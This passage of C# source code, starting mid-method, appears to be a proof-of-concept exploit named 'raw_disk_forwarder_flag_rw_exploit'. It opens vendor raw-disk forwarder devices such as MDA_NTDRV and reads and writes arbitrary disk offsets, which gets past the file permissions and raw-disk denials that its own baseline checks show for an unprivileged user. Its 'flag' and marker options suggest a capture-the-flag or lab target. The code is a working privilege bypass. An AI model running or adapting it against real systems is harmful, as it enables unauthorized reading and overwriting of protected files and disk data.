Console.WriteLine("[EXPLOIT_WRITE] marker={0}", opt.WriteMarker);
Console.WriteLine("[RESULT] write_succeeded=True");
return 0;
}
}
catch (Exception ex)
{
Console.Error.WriteLine("[ERROR] {0}: {1}", ex.GetType().Name, ex.Message);
return 1;
}
}
private static SafeFileHandle OpenForwarder(string devicePath)
{
return CreateFileW(devicePath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero);
}
private static byte[] RawRead(SafeFileHandle h, ulong offset, int length, out int reportedBytes)
{
if (!SetFilePointerEx(h, checked((long)offset), IntPtr.Zero, FILE_BEGIN))
{
throw new InvalidOperationException("SetFilePointerEx failed: " + Marshal.GetLastWin32Error());
}
IntPtr buf = Marshal.AllocHGlobal(length);
try
{
ZeroMemory(buf, length);
if (!ReadFile(h, buf, length, out reportedBytes, IntPtr.Zero))
{
throw new InvalidOperationException("ReadFile through vendor device failed: " + Marshal.GetLastWin32Error());
}
byte[] data = new byte[length];
Marshal.Copy(buf, data, 0, length);
return data;
}
finally
{
Marshal.FreeHGlobal(buf);
}
}
private static void RawWrite(SafeFileHandle h, ulong offset, byte[] payload)
{
if (!SetFilePointerEx(h, checked((long)offset), IntPtr.Zero, FILE_BEGIN))
{
throw new InvalidOperationException("SetFilePointerEx failed: " + Marshal.GetLastWin32Error());
}
IntPtr buf = Marshal.AllocHGlobal(payload.Length);
try
{
Marshal.Copy(payload, 0, buf, payload.Length);
int wrote;
if (!WriteFile(h, buf, payload.Length, out wrote, IntPtr.Zero) || wrote != payload.Length)
{
throw new InvalidOperationException("WriteFile through vendor device failed or short write: " + Marshal.GetLastWin32Error());
}
}
finally
{
Marshal.FreeHGlobal(buf);
}
}
private static void BaselineProtectedFile(string path)
{
try
{
File.ReadAllBytes(path);
Console.WriteLine("[BASELINE] protected_read=UNEXPECTED_SUCCESS path={0}", path);
}
catch (Exception ex)
{
Console.WriteLine("[BASELINE] protected_read=DENIED path={0} error={1}", path, ex.Message);
}
try
{
File.WriteAllText(path, "SHOULD-NOT-WRITE");
Console.WriteLine("[BASELINE] protected_write=UNEXPECTED_SUCCESS path={0}", path);
}
catch (Exception ex)
{
Console.WriteLine("[BASELINE] protected_write=DENIED path={0} error={1}", path, ex.Message);
}
}
private static void BaselineRawDisk(uint disk)
{
string path = @"\\.\" + "PhysicalDrive" + disk;
using (SafeFileHandle h = CreateFileW(path, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, 0, IntPtr.Zero))
{
if (h.IsInvalid)
{
Console.WriteLine("[BASELINE] raw_disk_open=DENIED path={0} error={1}", path, Marshal.GetLastWin32Error());
}
else
{
Console.WriteLine("[BASELINE] raw_disk_open=UNEXPECTED_SUCCESS path={0}", path);
}
}
}
private static void PrintIdentity()
{
WindowsIdentity id = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(id);
Console.WriteLine("[IDENTITY] user={0}", id.Name);
Console.WriteLine("[IDENTITY] is_administrator={0}", principal.IsInRole(WindowsBuiltInRole.Administrator));
Console.WriteLine("[IDENTITY] integrity={0}", GetIntegrityLevel());
}
private static string GetIntegrityLevel()
{
IntPtr token;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, out token)) return "unknown";
try
{
int needed;
GetTokenInformation(token, TokenIntegrityLevel, IntPtr.Zero, 0, out needed);
IntPtr buf = Marshal.AllocHGlobal(needed);
try
{
if (!GetTokenInformation(token, TokenIntegrityLevel, buf, needed, out needed)) return "unknown";
IntPtr sid = Marshal.ReadIntPtr(buf);
int count = Marshal.ReadByte(GetSidSubAuthorityCount(sid));
int rid = Marshal.ReadInt32(GetSidSubAuthority(sid, (uint)(count - 1)));
if (rid >= 0x4000) return "System";
if (rid >= 0x3000) return "High";
if (rid >= 0x2000) return "Medium";
if (rid >= 0x1000) return "Low";
return "Untrusted";
}
finally
{
Marshal.FreeHGlobal(buf);
}
}
finally
{
CloseHandle(token);
}
}
private static byte[] MakePayload(string marker, int length)
{
if (string.IsNullOrEmpty(marker)) throw new ArgumentException("--write-marker is required.");
byte[] payload = new byte[length];
byte[] markerBytes = Encoding.ASCII.GetBytes(marker);
Array.Copy(markerBytes, payload, Math.Min(markerBytes.Length, payload.Length));
for (int i = markerBytes.Length; i < payload.Length; i++) payload[i] = 0x42;
return payload;
}
private static string AsciiPreview(byte[] data, int max)
{
int len = Math.Min(data.Length, max);
return Encoding.ASCII.GetString(data, 0, len).Replace("\0", "\\0").Replace("\r", "\\r").Replace("\n", "\\n");
}
private static void ZeroMemory(IntPtr ptr, int length)
{
byte[] zeros = new byte[Math.Min(4096, length)];
int offset = 0;
while (offset < length)
{
int chunk = Math.Min(zeros.Length, length - offset);
Marshal.Copy(zeros, 0, IntPtr.Add(ptr, offset), chunk);
offset += chunk;
}
}
private static void Usage()
{
Console.Error.WriteLine("Usage:");
Console.Error.WriteLine(" raw_disk_forwarder_flag_rw_exploit.exe --device MDA_NTDRV --mode read --disk N --offset BYTES --length BYTES --flag-path PATH --expect-marker MARKER --out OUT.bin");
Console.Error.WriteLine(" raw_disk_forwarder_flag_rw_exploit.exe --device MDA_NTDRV --mode write --disk N --offset BYTES --length BYTES --write-marker MARKER");
Console.Error.WriteLine(" --device is the vendor raw-disk forwarder device name, for example MDA_NTDRV, EPMNTDRV, or EUEDKEPM.");
}
private sealed class Options
{
public string Device = "MDA_NTDRV";
public string Mode = "read";
public uint Disk;
public ulong OffsetBytes;
public ulong LengthBytes;
public string FlagPath;
public string ExpectMarker;
public string WriteMarker;
public string OutPath;
public static Options Parse(string[] args)
{
Options opt = new Options();
for (int i = 0; i < args.Length; i++)
{
string a = args[i].ToLowerInvariant();
if (a == "--device" && i + 1 < args.Length) opt.Device = args[++i];
else if (a == "--mode" && i + 1 < args.Length) opt.Mode = args[++i].ToLowerInvariant();
else if (a == "--disk" && i + 1 < args.Length) opt.Disk = UInt32.Parse(args[++i]);
else if (a == "--offset" && i + 1 < args.Length) opt.OffsetBytes = UInt64.Parse(args[++i]);
else if (a == "--length" && i + 1 < args.Length) opt.LengthBytes = UInt64.Parse(args[++i]);
else if (a == "--flag-path" && i + 1 < args.Length) opt.FlagPath = args[++i];
else if (a == "--expect-marker" && i + 1 < args.Length) opt.ExpectMarker = args[++i];
else if (a == "--write-marker" && i + 1 < args.Length) opt.WriteMarker = args[++i];
else if (a == "--out" && i + 1 < args.Length) opt.OutPath = args[++i];
else return null;
}
if (opt.Mode != "read" && opt.Mode != "write") return null;
if (string.IsNullOrWhiteSpace(opt.Device)) return null;
foreach (char c in opt.Device)
{
if (!char.IsLetterOrDigit(c) && c != '_' && c != '-') return null;
}
if (opt.LengthBytes == 0) return null;
if (opt.Mode == "read" && string.IsNullOrEmpty(opt.OutPath)) return null;
if (opt.Mode == "write" && string.IsNullOrEmpty(opt.WriteMarker)) return null;
return opt;
}
}
}